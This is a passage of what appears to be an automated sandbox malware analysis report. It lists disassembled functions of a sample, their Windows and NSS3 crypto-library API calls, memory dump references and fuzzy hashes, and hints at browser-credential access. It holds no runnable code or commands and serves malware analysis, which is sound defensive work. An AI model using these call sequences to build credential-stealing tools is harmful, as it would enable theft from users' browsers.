                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00419766
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 396451647-0
                                                                                                                                              • Opcode ID: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                                                                                                                              • Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
                                                                                                                                              • Opcode Fuzzy Hash: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                                                                                                                              • Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56
                                                                                                                                              Function 6C776DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6C776E36
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C776E57
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6C776E7D
                                                                                                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6C776EAA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3163584228-0
                                                                                                                                              • Opcode ID: 81a58aa29b5ca475441338c4adfd497f4d78b0ae5f21fdd978ebea4fc9afff56
                                                                                                                                              • Instruction ID: 19f7109fec0b0072e1f7ee7962cf35497f23ead6397276746cfbe5e5d4193415
                                                                                                                                              • Opcode Fuzzy Hash: 81a58aa29b5ca475441338c4adfd497f4d78b0ae5f21fdd978ebea4fc9afff56
                                                                                                                                              • Instruction Fuzzy Hash: 8431D73161061AEFDF241F34DE08396B7A9BB0131AF14063CD499D6A49E7B0A654CFB2
                                                                                                                                              Function 6C75DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C75DDB1,?,00000000), ref: 6C75DDF4
                                                                                                                                                • Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
                                                                                                                                                • Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
                                                                                                                                                • Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C75DDB1,?,00000000), ref: 6C75DE0B
                                                                                                                                              • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C75DDB1,?,00000000), ref: 6C75DE17
                                                                                                                                                • Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
                                                                                                                                                • Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15
                                                                                                                                              • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C75DE80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3725328900-0
                                                                                                                                              • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                              • Instruction ID: 7900667c1a9f762ca8db5728f8ca856566827bf67b02eb81b8459551e299e76e
                                                                                                                                              • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                              • Instruction Fuzzy Hash: 8D31A4B1A017429BE700CF56DA84656F7A8BFB5318B64822AD81D87B01EB71E5A4CB90
                                                                                                                                              Function 6C772DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6C772E08
                                                                                                                                                • Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
                                                                                                                                                • Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
                                                                                                                                                • Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6C772E1C
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C772E3B
                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C772E95
                                                                                                                                                • Part of subcall function 6C761200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7088A4,00000000,00000000), ref: 6C761228
                                                                                                                                                • Part of subcall function 6C761200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C761238
                                                                                                                                                • Part of subcall function 6C761200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7088A4,00000000,00000000), ref: 6C76124B
                                                                                                                                                • Part of subcall function 6C761200: PR_CallOnce.NSS3(6C862AA4,6C7612D0,00000000,00000000,00000000,?,6C7088A4,00000000,00000000), ref: 6C76125D
                                                                                                                                                • Part of subcall function 6C761200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C76126F
                                                                                                                                                • Part of subcall function 6C761200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C761280
                                                                                                                                                • Part of subcall function 6C761200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C76128E
                                                                                                                                                • Part of subcall function 6C761200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C76129A
                                                                                                                                                • Part of subcall function 6C761200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7612A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1441289343-0
                                                                                                                                              • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                              • Instruction ID: 5f42288251e9cbd0d7e6edb922e2e58cdc5a7b628e7aa61067f8e0d67881069a
                                                                                                                                              • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                              • Instruction Fuzzy Hash: 7D21D7B1E003498BEB10CF559E4CBAA37686F9130CF111279DD189B752F7F1E594C2A2
                                                                                                                                              Function 6C72ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CERT_NewCertList.NSS3 ref: 6C72ACC2
                                                                                                                                                • Part of subcall function 6C702F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C702F0A
                                                                                                                                                • Part of subcall function 6C702F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C702F1D
                                                                                                                                                • Part of subcall function 6C702AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C700A1B,00000000), ref: 6C702AF0
                                                                                                                                                • Part of subcall function 6C702AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C702B11
                                                                                                                                              • CERT_DestroyCertList.NSS3(00000000), ref: 6C72AD5E
                                                                                                                                                • Part of subcall function 6C7457D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C70B41E,00000000,00000000,?,00000000,?,6C70B41E,00000000,00000000,00000001,?), ref: 6C7457E0
                                                                                                                                                • Part of subcall function 6C7457D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C745843
                                                                                                                                              • CERT_DestroyCertList.NSS3(?), ref: 6C72AD36
                                                                                                                                                • Part of subcall function 6C702F50: CERT_DestroyCertificate.NSS3(?), ref: 6C702F65
                                                                                                                                                • Part of subcall function 6C702F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C702F83
                                                                                                                                              • free.MOZGLUE(?), ref: 6C72AD4F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 132756963-0
                                                                                                                                              • Opcode ID: ddddfa22a30ac31470ce1ea5c4929861c7aa0189b717c5cd17d969e0349ffccf
                                                                                                                                              • Instruction ID: 9520977ef3dcfdf1ad9803b8e3fd5775f442a46a7a3f5c03bb3438c4a6ac5e05
                                                                                                                                              • Opcode Fuzzy Hash: ddddfa22a30ac31470ce1ea5c4929861c7aa0189b717c5cd17d969e0349ffccf
                                                                                                                                              • Instruction Fuzzy Hash: B121C3B2D002148BEB10DF64EA0A5EEB7F4EF05258F454078D814BB700FB35AA49CBE1
                                                                                                                                              Function 6C753C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C753C9E
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C753CAE
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C753CEA
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C753D02
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 284873373-0
                                                                                                                                              • Opcode ID: 528fea61e8485242f3efeb0b2a8c2e2485813f1db6f0953c6489138e326413bf
                                                                                                                                              • Instruction ID: db6035457992bd9ceb12707c770c8bcaf753f7160638dc5c48d2b8eb75df9f7d
                                                                                                                                              • Opcode Fuzzy Hash: 528fea61e8485242f3efeb0b2a8c2e2485813f1db6f0953c6489138e326413bf
                                                                                                                                              • Instruction Fuzzy Hash: 0811D379A00214AFDB40EF24DD49A9A3778EF09368F954570EC088B722EB31ED55CBE1
                                                                                                                                              Function 00418950 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                                                                                                                              • wsprintfA.USER32 ref: 004189E0
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                                                                              • String ID: %dx%d
                                                                                                                                              • API String ID: 2716131235-2206825331
                                                                                                                                              • Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                                                                                                                              • Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
                                                                                                                                              • Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                                                                                                                              • Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5
                                                                                                                                              Function 6C75ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C75F0AD,6C75F150,?,6C75F150,?,?,?), ref: 6C75ECBA
                                                                                                                                                • Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
                                                                                                                                                • Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
                                                                                                                                                • Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C75ECD1
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C75ED02
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76116E
                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C75ED5A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2957673229-0
                                                                                                                                              • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                              • Instruction ID: a9c1e98a834629811c2e4f4e729b64d3cc58b314cf105c727ad75def7ea2292c
                                                                                                                                              • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                              • Instruction Fuzzy Hash: D621A4B1E007465BE700CF26DA49B52B7E4BFA4348F15C226E81C87A61EB70E5A4C7D0
                                                                                                                                              Function 6C78EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C777FFA,?,6C779767,?,8B7874C0,0000A48E), ref: 6C78EDD4
                                                                                                                                              • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C777FFA,?,6C779767,?,8B7874C0,0000A48E), ref: 6C78EDFD
                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C777FFA,?,6C779767,?,8B7874C0,0000A48E), ref: 6C78EE14
                                                                                                                                                • Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
                                                                                                                                                • Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,6C779767,00000000,00000000,6C777FFA,?,6C779767,?,8B7874C0,0000A48E), ref: 6C78EE33
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3903481028-0
                                                                                                                                              • Opcode ID: 307b2515c24e0f6e5fda417f9a252fcfa79e843dda94b6118d426df7954a2383
                                                                                                                                              • Instruction ID: db914df18878d17a925468915af33035c92bf50382e587545648c8004a9dad8a
                                                                                                                                              • Opcode Fuzzy Hash: 307b2515c24e0f6e5fda417f9a252fcfa79e843dda94b6118d426df7954a2383
                                                                                                                                              • Instruction Fuzzy Hash: F611A3B9A0270AABE7109E65DE88B46B3ACEF0435DF244535EA1982A41E331E464C7F1
                                                                                                                                              Function 6C728DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 284873373-0
                                                                                                                                              • Opcode ID: 690c944e4a5f46a12a54af20af089b4b9354acea23077e491a1e4986f9c86f69
                                                                                                                                              • Instruction ID: 7d049509fb2f03670024e6b8c76b64ba47981acb61e7e66fbc8ef69b7bd0db38
                                                                                                                                              • Opcode Fuzzy Hash: 690c944e4a5f46a12a54af20af089b4b9354acea23077e491a1e4986f9c86f69
                                                                                                                                              • Instruction Fuzzy Hash: F2118C75A05A119FD740AF78C5881AABBF4FF09718F01496ADC8897B01E738E894CBC2
                                                                                                                                              Function 00417B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
